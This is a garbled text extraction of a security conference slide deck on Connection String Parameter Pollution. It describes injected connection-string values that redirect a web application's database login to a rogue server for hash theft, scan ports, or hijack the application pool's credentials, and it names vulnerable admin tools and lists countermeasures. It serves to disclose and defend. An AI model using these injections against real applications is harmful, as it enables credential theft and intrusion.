Parameter Pollution in Connection Strings Attack · 2019-09-03 · Google Hacking Google ... Database Engine App running on Web Server ... Parameter Pollution in Connection Strings

Connec&onStrings

•  Definethewayanapplica&onconnectstoadatarepository

•  Thereareconnec&onstringsfor:– Rela&onalDatabases(MSSQL,Oracle,MySQL,…)– LDAPDirectories– Files(XML,plain,csv,xls,mdb,…)– Etc…

DatabasesConnec&onStrings

DataSource=myServerAddress;

Ini&alCatalog=myDataBase;UserId=myUsername;

Password=myPassword;

DBConnec&onbuildup

GoogleHacking

GoogleHacking

UDL(UniversalDataLinks)Files

HowWebappconnectstoDB

Opera&ngSystemAccounts

DataSource=myServerAddress;

Ini&alCatalog=myDataBase;UserId=;

Password=;IntegratedSecurity=SSPI/

True/Yes;

DatabaseCreden&als

DataSource=myServerAddress;

Ini&alCatalog=myDataBase;UserId=myUsername;

Password=myPassword;IntegratedSecurity=No;

Syslogins

Customuserstable

Connec&onstring

1.‐Webapplicatonconnectsusingitscreden&alstothedatabase.

2.‐Asksuserlogininforma&on.

3.‐Checkslogininforma&onaboutinfostoredincustomuserstable.

Selectidfromusers

Webapplica&onmanagestheloginprocess

Usersauthen&catedbyWebApp

DatabaseEngine ApprunningonWebServer

Syslogins Connec&onstring

1.‐Webapplica&onasksforcreden&als.

2.‐Aconnec&onstringiscomposedwiththecreden&alstoconnecttothedatabase.

3.‐Rolesandpermitsarelimitedbytheuserusedintheconnec&onstring

Databaseenginemanagestheloginprocess

Usersauthe&catedbyDatabase

DatabaseEngine ApprunningonWebServer

Connec&onStringA^acks

•  It´spossibletoinjectparametersintoconnec&onstringsusingsemicolonsasaseparator

DataSource=myServerAddress;

Ini&alCatalog=myDataBase;

IntegratedSecurity=NO;

UserId=myUsername;

Password=myPassword;Encryp2on=Off;

Connec&onStringBuilder

•  Availablein.NETFramework2.0

•  Buildsecureconnec&onstringsusingparameters•  It´snotpossibletoinjectintotheconnec&onstring

Arepeopleawareofthis?

Connec&onStringParameterPollu&on

•  Thegoalistoinjectparametersintheconnec&onstring,whethertheyexistornot

•  Hadduplicatedaparameter,thelastvaluewins

•  Thisbehaviorallowsa^ackerstooverwritecompletelytheconnec&onstring,thereforetomanipulatethewaytheapplica&onwillworkandhowshouldbetheitauthen&cated

DBConnec&onObject

Pollu&onableBehavior

Param1

Param2

Param1=ValueA Param2=ValueB Param1=ValueC Param2=ValueD

WhatcanbedonewithCSPP?Overwriteaparameter

DBConnec&onObjectDataSource

UID

DataSource=DB1 UID=sa DataSource=DB2

password

password=Pwnd!

ScanningtheDMZ

DevelopmentDatabase1

FinnacialDatabase

TestDatabase

ForgoGenDatabase

FW

WebappvulnerabletoCSPP

Internet Produc&onDatabase

DataSource

PortScanningaServer

FW

WebappvulnerabletoCSPP

Internet Produc&onDatabaseServer

DB1,80DB1,21DB1,25

DB1,1445

DataSource

WhatcanbedonewithCSPP?Addaparameter

DBConnec&onObjectDataSource

UID

DataSource=DB1 UID=sa IntegratedSecurity=True

password

password=Pwnd!

CSPPA^ack1:Hashstealing

1.‐RunaRogueServeronanaccessibleIPaddress:

Rogue_Server

2.‐Ac&vateasniffertocatchtheloginprocess

Cain/Wireshark

3.‐OverwriteDataSourceparameter

Data_Source=Rogue_Server

4.‐ForceWindowsIntegratedAuthen&ca&on

IntegratedSecurity=true

CSPPA^ack1:Hashstealing

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=+’User_Value’+;Password=+’Password_Value’+;

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=;DataSource=Rogue_Server;

Password=;IntegratedSecurity=True;

CSSP1:ASP.NETEnterpriseManager

CSPPA^ack2:PortScanning

1.‐DuplicatetheDataSourceparametersehngtheTargetserverandtargetporttobescanned. Data_Source=Target_Server,target_Port

2.‐Checktheerrormessages:

‐NoTCPConnec&on‐>Portisclosed

‐NoSQLServer‐>Portisopen

‐InvalidPassword‐>SQLServerthere!

CSPPA^ack2:PortScanning

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=+’User_Value’+;Password=+’Password_Value’+;

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=;DataSource=Target_Server,Target_Port;

Password=;IntegratedSecurity=True;

CSPP2:myLi^leAdmin

PortisOpen

CSPP2:myLi^leAdmin

PortisClosed

CSPPA^ack3:HijackingWebCreden&als

1.‐DuplicateDataSourceparametertothetargetSQLServer

Data_Source=Target_Server

2.‐ForceWindowsAuthen&ca&on

IntegratedSecurity=true

3.‐Applica&onpoolinwhichthewebappisrunningonwillsenditscreden&alsinordertologintothedatabaseengine.

CSPPA^ack3:HijackingWebCreden&als

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=+’User_Value’+;Password=+’Password_Value’+;

Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=;DataSource=Target_Server;

Password=;IntegratedSecurity=true;

CSPPA^ack3:WebDataAdministrator

CSPPA^ack3:myLi^leAdmin/myLi^leBackup

CSPPA^ack3:ASP.NETEnterpriseManager

OtherDatabases

•  MySQL–  DoesnotsupportIntegratedsecurity–  It´spossibletomanipulatethebehaviorofthewebapplica&on,

although•  PortScanning•  Connecttointernal/tes&ng/fordevelopingDatabases•  Stealcreden&als

•  OraclesupportsintegratedauthorityrunningonWindowsandUNIX/Linuxservers–  It´spossibletoperformalldescribeda^acks

•  Hashstealing•  PortScanning•  HijackingWebcreden&als

–  Alsoit´spossibletoelevateaconnec&ontosysdbainordertoshutdown/startupaninstance

DemoDemo

Scanner

•  Proofofconcepttotestyournetwork•  Tryahijackingwebcreden&alsa^ack• Wri^eninASP.NETC#

•  Freedownload(codeincludeofcourse)h^p://www.informa&ca64.com/csppScanner.aspx

CSPPScanner

ScannerCSPP:A^acks

DemoDemo

myLi^leAdmin/myLi^leBackup

myLi^leToolsreleasedasecuryadvisoryandapatchaboutthis

ASP.NETEnterpriseManager

•  ASP.NETEnterpriseManageris“abandoned”,butit´ss&llbeenusedinalotofwebControlPanels.

•  Fixthecodeyourself

ASP.NETEnterpriseManager•  ASP.NETEnterpriseManageris“abandoned”,butit´ss&llbeenusedinalotofwebControlPanels.

•  Fixthecodeyourself

ASP.NETWebDataAdmistrator

ASPWebDataAdministratorissecureinCodePlexwebsite,butnotinMicrosoowebsitewhereanunsecureoldversioniswaspublished

Countermeasures

•  Hardenyourfirewall– Outboundconnec&ons

•  Reviewyourinternalaccountspolicy– Webapplica&on– Webserver– DatabaseEngine

•  UseConnec5onStringBuilder

•  Filterthe;)

Ques&ons?

ContactoChemaAlonsochema@informa&ca64.comh^p://www.informa&ca64.comh^p://elladodelmal.blogspot.comh^p://twi^er.com/chemaalonso

AuthorsChemaAlonsoManuelFernández“TheSur”AlejandroMarsnBailónAntonioGuzmán